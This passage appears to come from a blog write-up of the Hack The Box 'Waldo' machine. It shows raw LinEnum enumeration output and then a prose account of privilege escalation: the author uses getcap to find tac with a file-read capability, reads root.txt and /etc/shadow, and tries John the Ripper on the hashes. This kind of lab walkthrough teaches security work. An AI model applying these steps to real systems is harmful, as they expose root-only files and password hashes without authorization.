valid_lft forever preferred_lft forever [-] ARP history: 10.10.10.2 dev ens33 lladdr 00:50:56:a4:99:88 REACHABLE [-] Nameserver(s): nameserver 10.10.10.2 [-] Nameserver(s): Global DNS Servers: 10.10.10.2 DNS Domain: localdomain DNSSEC NTA: 10.in-addr.arpa 16.172.in-addr.arpa 168.192.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa corp d.f.ip6.arpa home internal intranet lan local private test Link 3 (docker0) Current Scopes: none LLMNR setting: yes MulticastDNS setting: no DNSSEC setting: no DNSSEC supported: no Link 2 (ens33) Current Scopes: LLMNR/IPv4 LLMNR setting: yes MulticastDNS setting: no DNSSEC setting: no DNSSEC supported: no [-] Default route: default via 10.10.10.2 dev ens33 onlink [-] Listening TCP: State Recv-Q Send-Q Local Address:Port Peer Address:Port ESTAB 0 0 127.0.0.1:35820 127.0.1.1:ssh ESTAB 0 0 127.0.1.1:ssh 127.0.0.1:35820 ESTAB 0 10834 10.10.10.87:8888 10.10.14.19:58820 ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.6 56908 6736 ? Ss 04:04 0:01 /sbin/init root 2 0.0 0.0 0 0 ? S 04:04 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 04:04 0:00 [ksoftirqd/0] root 5 0.0 0.0 0 0 ? S< 04:04 0:00 [kworker/0:0H] root 7 0.0 0.0 0 0 ? S 04:04 0:00 [rcu_sched] root 8 0.0 0.0 0 0 ? S 04:04 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? S 04:04 0:00 [migration/0] root 10 0.0 0.0 0 0 ? S< 04:04 0:00 [lru-add-drain] root 11 0.0 0.0 0 0 ? S 04:04 0:00 [watchdog/0] root 12 0.0 0.0 0 0 ? S 04:04 0:00 [cpuhp/0] root 13 0.0 0.0 0 0 ? S 04:04 0:00 [kdevtmpfs] root 14 0.0 0.0 0 0 ? S< 04:04 0:00 [netns] root 15 0.0 0.0 0 0 ? S 04:04 0:00 [khungtaskd] root 16 0.0 0.0 0 0 ? S 04:04 0:00 [oom_reaper] root 17 0.0 0.0 0 0 ? S< 04:04 0:00 [writeback] root 18 0.0 0.0 0 0 ? S 04:04 0:00 [kcompactd0] root 19 0.0 0.0 0 0 ? SN 04:04 0:00 [ksmd] root 21 0.0 0.0 0 0 ? SN 04:04 0:00 [khugepaged] root 22 0.0 0.0 0 0 ? S< 04:04 0:00 [crypto] root 23 0.0 0.0 0 0 ? S< 04:04 0:00 [kintegrityd] root 24 0.0 0.0 0 0 ? S< 04:04 0:00 [bioset] root 25 0.0 0.0 0 0 ? S< 04:04 0:00 [kblockd] root 26 0.0 0.0 0 0 ? S< 04:04 0:00 [devfreq_wq] root 27 0.0 0.0 0 0 ? S< 04:04 0:00 [watchdogd] root 28 0.0 0.0 0 0 ? S 04:04 0:00 [kswapd0] root 29 0.0 0.0 0 0 ? S< 04:04 0:00 [vmstat] root 41 0.0 0.0 0 0 ? S< 04:04 0:00 [kthrotld] root 42 0.0 0.0 0 0 ? S< 04:04 0:00 [ipv6_addrconf] root 75 0.0 0.0 0 0 ? S< 04:04 0:00 [ata_sff] root 76 0.0 0.0 0 0 ? S 04:04 0:00 [scsi_eh_0] root 77 0.0 0.0 0 0 ? S 04:04 0:00 [scsi_eh_1] root 78 0.0 0.0 0 0 ? S< 04:04 0:00 [scsi_tmf_0] root 79 0.0 0.0 0 0 ? S< 04:04 0:00 [scsi_tmf_1] root 80 0.0 0.0 0 0 ? S< 04:04 0:00 [vmw_pvscsi_wq_0] root 81 0.0 0.0 0 0 ? S 04:04 0:00 [scsi_eh_2] root 82 0.0 0.0 0 0 ? S 04:04 0:00 [kworker/u256:1] root 83 0.0 0.0 0 0 ? S< 04:04 0:00 [scsi_tmf_2] root 84 0.0 0.0 0 0 ? S< 04:04 0:00 [bioset] root 128 0.0 0.0 0 0 ? S< 04:04 0:00 [bioset] root 132 0.0 0.0 0 0 ? S< 04:04 0:00 [kworker/0:1H] root 164 0.0 0.0 0 0 ? S 04:04 0:00 [jbd2/sda1-8] root 165 0.0 0.0 0 0 ? S< 04:04 0:00 [ext4-rsv-conver] root 191 0.0 1.0 133772 10444 ? Ss 04:04 0:13 /usr/bin/vmtoolsd root 192 0.0 0.0 0 0 ? S 04:04 0:00 [kauditd] root 196 0.0 0.4 56800 4836 ? Ss 04:04 0:00 /lib/systemd/systemd-journald root 221 0.0 0.3 45256 3440 ? Ss 04:04 0:00 /lib/systemd/systemd-udevd root 279 0.0 0.0 0 0 ? S< 04:04 0:00 [ttm_swap] root 310 0.0 0.0 0 0 ? S< 04:04 0:00 [edac-poller] systemd+ 348 0.0 0.4 127284 4200 ? Ssl 04:04 0:01 /lib/systemd/systemd-timesyncd root 366 0.0 0.3 250116 3260 ? Ssl 04:04 0:00 /usr/sbin/rsyslogd -n root 367 0.0 1.8 153488 18452 ? Ss 04:04 0:00 /usr/bin/VGAuthService root 368 0.0 0.2 29664 2848 ? Ss 04:04 0:00 /usr/sbin/cron -f message+ 370 0.0 0.3 45116 3676 ? Ss 04:04 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation root 384 0.0 0.4 46524 4800 ? Ss 04:04 0:00 /lib/systemd/systemd-logind root 509 0.1 6.4 452516 64620 ? Ssl 04:04 0:20 /usr/bin/dockerd -H fd:// root 512 0.0 0.1 14536 1660 tty1 Ss+ 04:04 0:00 /sbin/agetty --noclear tty1 linux root 513 0.0 0.6 69944 6208 ? Ss 04:04 0:00 /usr/sbin/sshd -D root 607 0.1 2.2 235016 22424 ? Ssl 04:05 0:20 docker-containerd --config /var/run/docker/containerd/containerd.toml root 734 0.0 0.4 7648 4388 ? Sl 04:05 0:00 docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/16c6cae0786900838a54b9b3ce253ddd80c3ccdcea93e6c5444e2a8a5a1eaebd -address /var/run/docker/containerd/docker-containerd.sock -containerd-binary /usr/bin/docker-containerd -runtime-root /var/run/docker/runtime-runc root 747 0.0 1.6 85124 16824 pts/0 Ss+ 04:05 0:04 /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf root 777 0.0 0.3 12784 3432 pts/0 S 04:05 0:00 nginx: master process nginx -g daemon off; root 778 0.0 0.2 7320 2664 pts/0 S 04:05 0:00 /usr/sbin/sshd -D -e root 779 0.0 1.7 133368 17404 pts/0 S 04:05 0:01 php-fpm: master process (/etc/php7/php-fpm.conf) systemd+ 780 0.0 0.1 13264 1680 pts/0 S 04:05 0:00 nginx: worker process root 782 0.0 0.2 7352 2716 ? Ss 04:06 0:00 sshd: nobody [priv] nobody 784 0.0 0.3 9112 3748 ? S 04:06 0:02 sshd: nobody@pts/1 nobody 785 0.0 0.1 1544 1028 ? Ss 04:06 0:00 -sh root 1288 0.0 0.0 0 0 ? S 06:08 0:08 [kworker/0:1] nobody 1364 0.0 0.3 8460 3716 ? S+ 06:27 0:01 ssh monitor@waldo -i .monitor root 1365 0.0 0.7 101380 7180 ? Ss 06:27 0:00 sshd: monitor [priv] monitor 1367 0.0 0.6 64872 6088 ? Ss 06:27 0:00 /lib/systemd/systemd --user monitor 1368 0.0 0.1 84492 1564 ? S 06:27 0:00 (sd-pam) monitor 1374 0.0 0.4 101380 4700 ? S 06:27 0:00 sshd: monitor@pts/0 monitor 1375 0.0 0.4 21176 4908 pts/0 Ss 06:27 0:00 -rbash monitor 1442 0.0 0.0 5856 692 pts/0 S 06:50 0:00 red -p red: monitor 1487 0.0 0.0 4288 796 pts/0 S 07:27 0:00 sh -c /bin/bash monitor 1488 0.0 0.5 21216 5096 pts/0 S 07:27 0:00 /bin/bash systemd+ 1741 0.0 0.4 49620 4052 ? Ss 07:50 0:00 /lib/systemd/systemd-resolved root 1754 0.0 0.0 0 0 ? S 07:50 0:00 [kworker/u256:0] root 2381 0.0 0.0 0 0 ? S 09:28 0:00 [kworker/0:2] root 2382 0.0 0.0 0 0 ? S 09:33 0:00 [kworker/0:0] monitor 2391 0.0 0.3 12140 3888 pts/0 S+ 09:38 0:00 /bin/bash /tmp/LinEnum.sh monitor 2392 0.0 0.3 12176 3372 pts/0 S+ 09:38 0:00 /bin/bash /tmp/LinEnum.sh monitor 2393 0.0 0.0 5844 688 pts/0 S+ 09:38 0:00 tee -a monitor 2564 0.0 0.2 12176 2924 pts/0 S+ 09:38 0:00 /bin/bash /tmp/LinEnum.sh monitor 2565 0.0 0.3 38304 3168 pts/0 R+ 09:38 0:00 ps aux [-] Process binaries and associated permissions (from above list): 776K -rwxr-xr-x 1 root root 773K Mar 1 2018 /usr/sbin/sshd 640K -rwxr-xr-x 1 root root 637K Jan 18 2017 /usr/sbin/rsyslogd 48K -rwxr-xr-x 1 root root 48K Oct 7 2017 /usr/sbin/cron 48K -rwxr-xr-x 1 root root 48K Jul 25 2017 /usr/bin/vmtoolsd 152K -rwxr-xr-x 1 root root 149K Jul 25 2017 /usr/bin/VGAuthService 0 lrwxrwxrwx 1 root root 9 Jan 24 2017 /usr/bin/python2 -> python2.7 79M -rwxr-xr-x 1 root root 79M Apr 10 14:20 /usr/bin/dockerd 220K -rwxr-xr-x 1 root root 219K Mar 2 2018 /usr/bin/dbus-daemon 0 lrwxrwxrwx 1 root root 20 Mar 23 08:55 /sbin/init -> /lib/systemd/systemd 60K -rwxr-xr-x 1 root root 57K Mar 7 2018 /sbin/agetty 456K -rwxr-xr-x 1 root root 455K Mar 23 08:55 /lib/systemd/systemd-udevd 40K -rwxr-xr-x 1 root root 39K Mar 23 08:55 /lib/systemd/systemd-timesyncd 316K -rwxr-xr-x 1 root root 315K Mar 23 08:55 /lib/systemd/systemd-resolved 204K -rwxr-xr-x 1 root root 203K Mar 23 08:55 /lib/systemd/systemd-logind 120K -rwxr-xr-x 1 root root 119K Mar 23 08:55 /lib/systemd/systemd-journald 1.1M -rwxr-xr-x 1 root root 1.1M Mar 23 08:55 /lib/systemd/systemd 1.1M -rwxr-xr-x 1 root root 1.1M May 15 2017 /bin/bash [-] /etc/init.d/ binary permissions: total 88 drwxr-xr-x 2 root root 4096 Jul 15 09:48 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rwxr-xr-x 1 root root 2014 May 29 2017 anacron -rwxr-xr-x 1 root root 2948 Sep 13 2017 bluetooth -rwxr-xr-x 1 root root 1232 Apr 6 2017 console-setup.sh -rwxr-xr-x 1 root root 3049 Oct 7 2017 cron -rwxr-xr-x 1 root root 2813 Mar 2 2018 dbus -rwxr-xr-x 1 root root 3843 Apr 10 14:09 docker -rwxr-xr-x 1 root root 3809 Mar 22 2017 hwclock.sh -rwxr-xr-x 1 root root 1479 May 18 2016 keyboard-setup.sh -rwxr-xr-x 1 root root 2044 Dec 25 2016 kmod -rwxr-xr-x 1 root root 1364 Mar 17 2017 netfilter-persistent -rwxr-xr-x 1 root root 4597 Sep 16 2016 networking -rwxr-xr-x 1 root root 1846 Jul 25 2017 open-vm-tools -rwxr-xr-x 1 root root 1191 Nov 22 2016 procps -rwxr-xr-x 1 root root 4355 Dec 10 2017 rsync -rwxr-xr-x 1 root root 2868 Jan 18 2017 rsyslog -rwxr-xr-x 1 root root 4033 Mar 1 2018 ssh -rwxr-xr-x 1 root root 6087 Dec 3 2017 udev ### SOFTWARE ############################################# ### INTERESTING FILES #################################### [-] Useful file locations: /bin/nc /bin/netcat /usr/bin/wget /usr/bin/gcc /usr/bin/curl [-] Installed compilers: ii gcc 4:6.3.0-4 amd64 GNU C compiler ii gcc-6 6.3.0-18+deb9u1 amd64 GNU C compiler [-] Can we read/write sensitive files: -rw-r--r-- 1 root root 1627 May 3 16:50 /etc/passwd -rw-r--r-- 1 root root 773 May 3 16:50 /etc/group -rw-r--r-- 1 root root 869 May 3 16:50 /etc/profile -rw-r----- 1 root shadow 1218 May 3 16:50 /etc/shadow [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [-] All *.conf files in /etc (recursive 1 level): -rw-r--r-- 1 root root 2792 Jul 24 05:50 /etc/sysctl.conf -rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf -rw-r--r-- 1 root root 7431 May 1 23:26 /etc/ca-certificates.conf -rw-r--r-- 1 root root 9 Aug 7 2006 /etc/host.conf -rw-r--r-- 1 root root 346 Nov 30 2016 /etc/discover-modprobe.conf -rw-r--r-- 1 root root 3173 Mar 2 2018 /etc/reportbug.conf -rw-r--r-- 1 root root 60 Jul 23 10:14 /etc/resolv.conf -rw-r--r-- 1 root root 1963 Jan 18 2017 /etc/rsyslog.conf -rw-r--r-- 1 root root 497 Dec 31 2017 /etc/nsswitch.conf -rw-r--r-- 1 root root 2969 May 21 2017 /etc/debconf.conf -rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf -rw-r--r-- 1 root root 4781 Jan 24 2017 /etc/hdparm.conf -rw-r--r-- 1 root root 191 Apr 12 2017 /etc/libaudit.conf -rw-r--r-- 1 root root 2981 May 1 23:03 /etc/adduser.conf -rw-r--r-- 1 root root 2584 Aug 1 2016 /etc/gai.conf -rw-r--r-- 1 root root 599 May 5 2015 /etc/logrotate.conf -rw-r--r-- 1 root root 144 May 1 23:30 /etc/kernel-img.conf -rw-r--r-- 1 root root 552 May 27 2017 /etc/pam.conf -rw-r--r-- 1 root root 973 Jan 31 2017 /etc/mke2fs.conf -rw-r--r-- 1 root root 604 Jun 26 2016 /etc/deluser.conf -rw-r--r-- 1 root root 34 Apr 9 2017 /etc/ld.so.conf [-] Current user's history files: lrwxrwxrwx 1 root root 9 Jul 24 07:58 /home/monitor/.bash_history -> /dev/null [-] Location and contents (if accessible) of .bash_history file(s): /home/monitor/.bash_history [-] Any interesting mail in /var/mail: total 8 drwxrwsr-x 2 root mail 4096 May 1 23:03 . drwxr-xr-x 11 root root 4096 May 1 23:03 .. [+] Looks like we're hosting Docker: Docker version 18.04.0-ce, build 3d479c0 ### SCAN COMPLETE #################################### monitor@waldo:/tmp$
Privilege Escalation
Privesc on this machine took ages. I got stuck down various rabbit holes for hours, days even. I’m not going lie, I don’t think that without some HTB forum hints I would have got much further in any reasonable amount of time.
The app-dev folder contains code and executables for a log monitoring application and since the passwd file says the monitor user is “for editing source and monitoring logs” I assumed that the box-writer intended us to edit some source code. The logMonitor binary in the app-dev folders doesn’t do what it’s supposed to do. Feeding it options like -a doesn’t read the log that the source code indicates it should, only the -h help options works. However there is a subfolder with a 0.1 version which DOES work. But the weird thing is, that file does not have root permissions or SUID set, which leaves you wondering how it’s able to access log files that the other app cannot even though they’re both being used by the same user. So the question becomes “what is the difference between this and the non-working version?”:
The answer turns out to be down to Capabilities which are a security feature that allows you to dish out subdivisions of superuser privileges like reading files etc see: https://man7.org/linux/man-pages/man7/capabilities.7.html – if you use the getcap command you can see what Capabilities the updated logMonitor binary has, that the other one doesn’t. Maybe there is a clever way of using this involving editing the source code to give you various powers overwriting the logMonitor-0.1 and abusing, there is a python file that appears to check a file do something with the hash which also hints at maybe replacing this file, but I couldn’t work it out if there is. But using getcap -r / 2>dev/null shows the Capabilities settings for all files we can access and it shows up a command called tac (which is cat in reverse) which can output the contents of files and since it’s been given the root-level file-read capability, it can read the /root/root.txt and we’ve got our flag.
We can also read the shadow file and I ran JTR over the hashes found there but didn’t get a hit with the wordlists I used.
Leave a Reply